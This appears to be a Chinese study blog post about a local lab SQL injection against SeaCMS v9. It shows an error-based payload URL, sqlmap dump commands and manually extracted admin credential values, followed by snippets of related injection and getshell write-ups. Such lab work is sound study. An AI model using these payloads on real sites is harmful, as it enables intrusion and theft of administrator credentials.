seacmsv9注入管理员账号密码

已于 2025-03-29 16:56:02 修改
阅读量346 收藏 10
点赞数 4
文章标签: 学习
于 2025-03-10 20:45:01 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/weixin_73729058/article/details/145879111
版权

seacmsv9注入管理员账号密码

sea_comment表中没有数据,在管理器中插入查看方便一些

http://127.0.0.1/seacmsv9/upload/comment/api/index.php?gid=1&page=2&rlist[]=@%27,%20extractvalue(1,%20concat_ws(0x20,%200x5c,database())),@%27

(但是只成功过一次)

用SQL注入工具:sqlmap(自动化)

sqlmap -u "http://127.0.0.1/seacmsv9/upload/comment/api/index.php?gid=1&page=2&type=1&rlist[]=1" --technique=B --dbms=mysql --level=5 --risk=3

sqlmap -u "http://127.0.0.1/seacmsv9/upload/comment/api/index.php?gid=1&page=2&type=1&rlist[]=1" --dbms=mysql --dump

手动提取方法:

确定字段

即5

已知第一个字符的 ASCII 值 =97,第二个字符的 ASCII 值 =100,第二个字符的 ASCII 值 =109,第四个=105,第五个等于110

返回admin,提取的数据正确

password 字段的长度20,第一个字段102,然后是50,57,55,97,53,55,97,53,97,55,52,51,56,57,52,97,48,101,52

Order by

ORDER BY-Error-Numeric

SQL注入:对cms管理系统进行SQL注入,分别使用手工注入和自动化注入两种方法,获取管理员账号密码
2401_83124412的博客
06-29 703
进行字符转码:cms_article,cms_category,cms_file,cms_friendlink,cms_message,cms_notice,cms_page,cms_users。id=33 and 1=1 /and 1=2判断。3.爆破字段,猜测数据在cms_users表里面,查看字段,有id,username,password三个字段。回显报错信息,因为联合查询,每列的数据类型不同而报错,将 table_name。传参id=33’,报错’’’,可初步判定存在数字型注入点,进一步验证。
04 渗透测试基础
热门推荐
weixin_43234021的博客
01-04 1万+
渗透测试基础一 代码审计1 基础环境搭建(1) Web服务:WAMP+phpstudy(2) phpstudy2 HTML 表单 一 代码审计 1 基础环境搭建 (1) Web服务:WAMP+phpstudy (2) phpstudy 启动问题 端口正常开放 80 http 3306 mysql web根目录[C:\Users\dq\Documents\phpStudy-1-24\phpStudy\WWW] php 探针 phpinfo.php phpmyadmin Apache配置文件:[
seacmsv9进行sql注入,orderby,过滤information_schema
m0_75167824的博客
03-01 491
由于seacms开源,可以知道seacmsv9系统数据库(mysql)为seacms,存放管理员账号的表为sea_admin,表中存放管理员姓名的字段为name,存放管理员密码的字段为password。没有返回报错与查询的值,但是查询database()就可以查询数据库表名,于是查询sea_comment,发现居然没有数据,于是就插入了几条数据,发现可以执行了。密码也是如此------注入密码为23a7bbd73250516f069d,可以看出是经过md5加密的,于是到。sqlilabs靶场第46关。
seacms代码审计-sql注入
qq_34012951的博客
05-17 739
1、环境:seacmsv10 2、注入:http://www.seacmsv10.com/comment/api/index.php?&XDEBUG_SESSION_START=PHPSTORM&gid=1&page=2&type=3&rlist[]=gzm 占位符:gzm phpstorm调试,查看执行语句,在mysql拼接语句复现。 3、重新注入:http://www.seacmsv...
Seacms最新版本注入实战+后台RCE成功getshell-2018年老文章
J0o1ey Blog
06-21 6730
有技术培训需求/技术交流/代码审计需求/的朋友可以联系QQ547006660 0X001海洋CMS简介# 海洋cms是为解决站长核心需求而设计的视频内容管理系统,一套程序自适应电脑、手机、平板、APP多个终端入口,无任何加密代码、安全有保障,是您最佳的建站工具。——来自seacms官网(简而言之就是专门搭建看片网站的cms) 呵呵,安全有保障??头都给你打爆掉,百度搜索seacms。。漏洞信息...
CVE-2020-21378(seacms后台SQL注入) 分析
RestoreJustice的博客
03-16 1574
变量没有经过什么过滤就直接插入到SQL语句中(360webscan.php会使用正则规则对注册的变量会进行检查,但对$id并没有任何检查),也没有引号包裹,十分好利用。在seacms v10.1版本中,在sql.class.php中GetOne中加入了对SQL语句的安全检查(上面的注入语句这里用不了)绕过方法参考https://xz.aliyun.com/t/2828#toc-3。下面这里的这个检查与先前审计过的duomicms的检查函数一样,是以单引号为界,把第一个引号前的语句给。
seacms sql注入
Matthew
08-30 5883
最近在学习代码审计,审到一个注入,提交,说重复了,好尴尬啊。 源码下载:http://www.mycodes.net/47/7976.htm 在/i.php,获取ip的时候,全局的ip获取是做了正则。不知道问什么这里重新进行了一次ip的获取。<?php session_start(); require_once("include/common.php"); require_once(sea_I
seacmsv9注入管理员账号密码+orderby+limit
Wacjey的博客
02-26 814
①数据依赖性:updatexml函数的报错注入通常是通过构造恶意的XPath表达式,使其产生错误并泄露部分信息,如果注入点的逻辑要求从sea_comment表中读取数据以构建这个恶意的XPath表达式,那么当sea_comment为空时,就无法构造出有效的报错语句;用sort=if(表达式,id,username)的方式注入,通过BeautifulSoup爬取表格中username下一格的 值是否等于Dumb来判断表达式的真假,并使用二分查找加快注入速度,从而实现boolen(布尔) 注入,具体代码如下。
seacmsv9注入管理员账号密码+order by+limit
lq_ioi_pl的博客
02-25 816
这样的话,由于order by默认是升序排列的,没有desc也没有影响,同时,加上了^0也还是id本身,所以跟原来正常的排序没有任何的变化。另外就是没有order by注入没有回显的情况,这时就该用到盲注了,也就是说采取根据页面回显的状态进行判断的形式来进行布尔盲注。但如果是加上了^1的话,就会跟原来的排序发生明显变化,盲注也就通过这里的变化来判断我们注入的sql语句是否返回1。首先这里运用到了一个异或的知识,0异或任何数值都还是这个值的本身,比如说0^10010的值还是10010。
Seacms漏洞分析利用复现 By Assassin
Assassin
08-03 1万+
碰到了cms,之前一直没有真正的分析过,趁着没事干准备复现一个seacms的漏洞复现,但是经过一系列的苦痛挣扎发现—–搭个环境神特么难…一开始我想用ubuntu直接搭建,但是我用的是php7,而各大seacms的安装指南上说…===必读提示=== ------------------------------------- 【1】自适应模板不支持IE6/7/8古董浏览器,会发生错误。国内双核浏览器的兼
Python Day44 学习(日志Day12复习)
最新发布
Y317429的博客
06-07 107
注:这里AI给出的“适用场景”存在问题。关于性别,为二分类问题,不需要使用独热编码。三分类以上才涉及独热编码。出现问题:忘记之前已对数据进行了独热编码,导致映射出来的值为空值。对信贷数据重新进行标签编码(回写昨日复习的代码)对信贷数据重新进行标签编码(回写昨日复习的代码)补充:对数据进行“归一化”和“标准化”的作用。补充:“独热编码”与“标签编码”的选择。
Apple风格在DPSK学习平台页面设计中的应用
qq_39764825的博客
06-04 603
苹果设计美学在网页中的应用:DPSK学习助手网站设计实践 摘要:本文探讨了Apple设计风格在网页设计中的具体应用。核心要素包括:极简主义(留白艺术、简化导航)、毛玻璃效果(背景模糊创造层次感)。视觉特征表现为柔和的渐变色彩、超大无衬线字体排版。交互设计强调微动画和平滑过渡,采用卡片式布局。技术实现上运用现代CSS特性(毛玻璃效果、响应式字体)和移动优先策略。Apple风格有效提升可读性、可用性和品牌识别。实践建议包括参考iOS设计指南、保持一致性并关注细节。最终证明,这种以用户为中心的设计哲学能创造美观实
【Python 学习笔记】dictionary unpacking
cbldzz的博客
06-03 364
【代码】【Python 学习笔记】dictionary unpacking。
c++之STL容器的学习(上)
2202_76101487的博客
06-03 443
基于c++的STL标准库的容器学习
NLP学习路线图(二十):FastText
2501_91516851的博客
06-03 1096
FastText是Facebook AI团队提出的创新型词向量模型,它在Word2Vec基础上引入字符n-gram的子词信息,有效解决了传统词向量在形态丰富语言、罕见词和OOV词处理上的痛点。该模型通过将词分解为字符n-gram的组合,利用共享的n-gram向量实现词义的分解与重组,显著提升了词向量表示的泛化能力。FastText具有训练高效、内存占用少等优势,尤其擅长处理社交媒体文本等存在大量新词和拼写错误的场景。
NLP学习路线图(二十九):BERT及其变体
2501_91516851的博客
06-06 822
在自然语言处理(NLP)领域,一场静默的革命始于2017年。当谷歌研究者发表《Attention is All You Need》时,很少有人预料到其中提出的Transformer架构会彻底颠覆NLP的发展轨迹,更催生了以GPT系列为代表的语言模型风暴,重新定义了人类与机器的交互方式。
【AI学习】transform模型
gogo小Sa的专栏
06-05 875
CNN(Convolutional Neural Network)是卷积神经网络,它能够从低级特征到高级语义特征逐步提取信息,这种逐层提取和组合特征的方式,在图像和视频领域取得了显著成果,但是不适合不定长序列的处理。(multi-head attention)则进一步增强了模型的表达能力,使其能够同时关注输入序列中的不同部分,捕捉更加复杂的语义关系。1、准备训练数据:准备多组训练数据(x,y),例如(X1,Y1)、(X2,Y2)...(Xn,Yn),x表示输入,y表示预期输出。
CppCon 2014 学习:Mixins for C++
虾球
06-04 756
问题组合的限制解决方式数量不定组合不能变参用变参模板继承名字固定成员名必须提前写死无法完美解决,可通过tupleget<N>绕过方法转发需要手动转发成员方法C++20 的可改善Variadic CRTP + 多继承,将多个策略的成员变量和方法“拼装”到一个类型中。策略聚合体) 作为中枢协调整体状态和类型。通过模板元编程,变成了一个功能非常灵活且强类型的查询对象。每个策略负责自己的一块责任,互不干扰,易于扩展。select_t,no_from_t,是。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值